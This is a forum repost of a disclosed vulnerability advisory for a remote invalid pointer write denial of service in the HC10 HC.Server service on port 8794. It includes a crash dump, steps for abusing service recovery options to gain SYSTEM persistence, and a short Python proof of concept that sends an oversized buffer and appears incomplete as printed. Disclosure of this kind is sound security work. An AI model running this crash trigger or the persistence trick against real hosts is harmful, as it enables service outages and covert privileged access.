Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

HC10 HC.Server Service 10.14 - Remote Invalid Pointer Write



Recommended Posts

[+] Credits: John Page (aka hyp3rlinx)		
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/HC10-HC.SERVER-10.14-REMOTE-INVALID-POINTER-WRITE.txt
[+] ISR: ApparitionSec          


HC10 HC.Server Service 10.14

HC10 is a unified hosting automation control panel for web hosts and Cloud based service providers to manage both Windows & Linux servers
simultaneously as part of a single cluster. HC works on an N-tier user model.

[Vulnerability Type]
Remote Invalid Pointer Write

[CVE Reference]

[Security Issue]
The HC.Server service in Hosting Controller HC10 10.14 allows an Invalid Pointer Write DoS if attackers can reach the service on port 8794.
In addition this can potentially be leveraged for post exploit persistence with SYSTEM privileges, if physical access or malware is involved.

If a physical attacker or malware can set its own program for the service failure recovery options, it can be used to maintain persistence.
Afterwards, it can be triggered by sending a malicious request to DoS the service, which in turn can start the attackers recovery program.
The attackers program can then try restarting the affected service to try an stay unnoticed by calling "sc start HCServerService".

Services failure flag recovery options for "enabling actions for stops or errors" and can be set in the services "Recovery" properties tab
or on the command line. Authentication is not required to reach the vulnerable service, this was tested successfully on Windows 7/10.

        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : "C:\Program Files\Hosting Controller\Provisioning\HC.Server.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : HC Server Service
        DEPENDENCIES       : HCProvisioningService
        SERVICE_START_NAME : LocalSystem

Crash Dump:


CONTEXT: (.ecxr)
rax=0000000000000bfd rbx=0000000000df94f0 rcx=03743db166a90000
rdx=0000000080000000 rsi=00000000000000b4 rdi=0000000000000000
rip=0000000140025b6c rsp=000000000118f570 rbp=0000000000000000
r8=000000000000001f r9=00000000000006fe r10=0000000000000603
r11=0000000000df0158 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
00000001`40025b6c c68404d001000000 mov byte ptr [rsp+rax+1D0h],0 ss:00000000`0119033d=??
Resetting default scope

00000001`40025b6c c68404d001000000 mov byte ptr [rsp+rax+1D0h],0

ExceptionAddress: 0000000140025b6c (HC_Server+0x0000000000025b6c)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000001
Parameter[1]: 000000000119033d
Attempt to write to address 000000000119033d


1) Configure the HCServiceService recovery failure options to an arbitrary program.
2) Trigger the remote invalid pointer write to gain persistence with SYSTEM privileges.

from socket import *

IP = raw_input("[+] HC Server Service IP ")
PORT = 8794

payload = "A"*4000
s.connect((IP, PORT))

print "Triggering HC10 Server Service Xploit"
print "hyp3rlinx"

[Network Access]


[Disclosure Timeline]
Vendor Notification: May 14, 2019
No reply
Second notification: May 21, 2019
Vendor "will change the implementation soon in any of forthcoming installer." : May 22, 2019 
mitre assign CVE: May 27, 2019
Vendor : "New installer to be released June 13, 2019"
June 16, 2019 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

Link to post
Link to comment
Share on other sites


discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    • Create New...